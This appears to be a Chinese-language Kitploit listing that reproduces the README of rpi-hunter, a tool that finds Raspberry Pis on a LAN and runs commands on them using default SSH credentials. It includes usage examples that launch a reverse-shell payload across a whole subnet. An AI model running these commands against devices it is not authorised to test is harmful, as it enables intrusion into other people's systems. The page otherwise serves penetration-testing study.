Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
rpi-hunter — 自动发现并利用局域网中的树莓派 | Kitploit
工具/GitHubGitHub/busescanfly/rpi-hunter
Payload生成漏洞利用信息收集网络安全渗透测试
GitHubbusescanfly/rpi-hunter

rpi-hunter

自动发现并利用局域网中的树莓派

查看仓库
108161042年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

rpi-hunter

  • 自动化发现局域网上的 Raspberry Pi 并通过 SSH 植入 payload
  • 或者直白的说法:自动化使用 sshpass 传递命令

alt text

当局域网内有多个使用默认或已知凭据的 Raspberry Pi 时,rpi-hunter 可用于自动化向它们发送命令/payload。

指南:

安装

  1. 安装依赖:sudo pip install -U argparse termcolor 和 sudo apt -y install arp-scan tshark sshpass
  2. 下载 rpi-hunter:git clone https://github.com/BusesCanFly/rpi-hunter
  3. 进入 rpi-hunter 目录:cd ./rpi-hunter
  4. 使 rpi-hunter.py 可执行:chmod +x rpi-hunter.py
  • 单行安装:sudo pip install -U argparse termcolor && sudo apt -y install arp-scan tshark sshpass && git clone https://github.com/BusesCanFly/rpi-hunter && cd ./rpi-hunter && chmod +x rpi-hunter.py

使用方法

查看 NullByte 团队制作的这个超棒 视频 及其配套的 文章!

  • 注意: 对于新用户,我更新了 rpi-hunter,修复了一些 bug 并添加了一些功能 :) 运行 ./rpi-hunter.py 命令将自动扫描整个本地网络,并在找到的任何树莓派上执行 whoami 命令
usage: rpi-hunter.py [-h] [--list] [--no-scan] [-r IP_RANGE] [-f IP_LIST]
                     [-c CREDS] [--payload PAYLOAD] [-H HOST] [-P PORT]
                     [--safe] [-q]

optional arguments:
  -h, --help         show this help message and exit
  --list             List available payloads
  --no-scan          Disable ARP scanning
  -r IP_RANGE        IP range to scan
  -f IP_LIST         IP list to use (Default ./scan/RPI_list)
  -u UNAME           Username to use when ssh'ing
  -c CREDS           Password to use when ssh'ing
  --payload PAYLOAD  (Name of, or raw) Payload [ex. reverse_shell or 'whoami']
  -H HOST            (If using reverse_shell payload) Host for reverse shell
  -P PORT            (If using reverse_shell payload) Port for reverse shell
  --safe             Print sshpass command, but don't execute it
  -q                 Don't print banner
  • 运行 ./rpi-hunter.py --list 查看可用 payload。

  • Payload 可以通过 --list 显示的名称指定,也可以直接输入原始命令

    • 例如:--payload reverse_shell 或 --payload [你的 CLI 命令]
  • 使用示例:

    • ./rpi-hunter.py -r 192.168.0.0/16 --payload reverse_shell -H 127.0.0.1 -P 1337
      • 注意: 只有 "reverse_shell" payload 需要 -H 和 -P 标志
    • ./rpi-hunter.py -c lamepassword --payload "ls -lah \~"
      • 注意: 确保使用 \ 转义特殊字符

免责声明:

标准的互联网娱乐免责声明适用。不要犯罪,要有责任感。

对于您使用 rpi-hunter 所做的一切,我概不负责。

下载工具